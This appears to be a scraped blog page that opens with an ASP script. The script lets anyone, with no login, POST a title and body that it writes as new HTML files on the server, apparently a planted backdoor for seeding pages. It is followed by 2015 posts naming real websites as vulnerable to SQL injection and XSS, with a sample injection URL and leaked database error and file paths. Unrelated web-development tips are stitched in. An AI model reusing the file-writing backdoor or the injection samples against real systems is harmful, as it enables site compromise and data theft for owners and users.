if request.Form("c")<>"" then
randomize
shuliang=Int((10000000 - 1 + 10000000) * Rnd + 1)
title=Replace(request.Form("title")," ","-")
path1=replace(server.mappath("1.asp"),"1.asp","")
path=path1&title&"-"&shuliang&".html"
dbfile=path1&"1.htm"
response.Write path&"<br>"
response.Write dbfile&"<br>"
str1=Replace(request.Form("c"),"<br><","<")&"</body></html>"
str2="<a href="&title&"-"&shuliang&".html"">"&request.Form("title")&"</a>"
response.Write str1&"<br>"
response.Write str2&"<br>"
set myfso = Server.CreateObject("Scripting.FileSystemObject")
set myfile1 = myfso.CreateTextFile(path,true)
set myfile2 = myfso.CreateTextFile(dbfile,true)
        myfile1.WriteLine(str1)
        myfile1.close
            myfile2.WriteLine(str2)
        myfile2.close
        set myfso = nothing

response.Write "<font color=red>Good Luck!</font>"
end if
%>
<title>MS</title>
SD
<form action="" method="post">
  <input type="text" size=48 name="title" value='' />
  <input type="submit" id="b" value="J8"><br>
<textarea name="c" cols=60 rows=9></textarea>
</form>
<p></p>

Friday, 17 July 2015

http://www.lcsoftware.com/ | sql injection, xss, system compromise

sample:

http://www.lcsoftware.com/lcss-modules/listings/PublicListingController.php?Action=def&id=11%277&statusFilter=40&pageSize=5&pos=0

error:
Failed to execute query:
select listing_id, TITLE, ADDRESS, CITY, ZIP, STATE, PRICE, DESCRIPTION, TYPE_ID, BEDS, BATHS, FLOORS, SQUARE_FEET, LOT_SIZE, GARAGE_SIZE, YEAR_BUILD, ANNUAL_PROPERTY_TAX, STATUS_ID, HOME_FEATURES, COMMUNITY_FEATURES, MLS, USER_ID, CREATED, RANK, IS_FEATURE_LISTING from LCSS_LISTING WHERE USER_ID='11'7' ORDER BY STATUS_ID, PRICE ASC LIMIT 0, 5

Tuesday, 7 July 2015

Fix placeholders an all browsers - internet explorer, firefox, windows, linux, mac

Go to http://jamesallardice.github.io/Placeholders.js/
and download the latest placeholders.min.js

Just add

<script language="javascript" type="text/javascript" src="images/placeholders.min.js"></script>
in your code and the placeholders will work an all the browsers with js support.



Monday, 22 June 2015

http://www.timmymobile.com | SQL Injection, data leakage


 
E:\My work\Myprobject\天米\Meters\
   DAL.AllSelect.GetList(String tableName, String where)
E:\My work\Myprobject\天米\Meters\DAL\AllSelect.cs
 
A generic error returns if we try simple (possible?) sql injections.
 
The scripts are really simple to circumvent. 

Sunday, 21 June 2015

Sitemap xml url rewrite rule


An example could be something like that, where our script is sitemap.php.
RewriteRule ^sitemap\.xml$ /sitemap.php [L]

Twitter Delicious Facebook Digg Stumbleupon Favorites More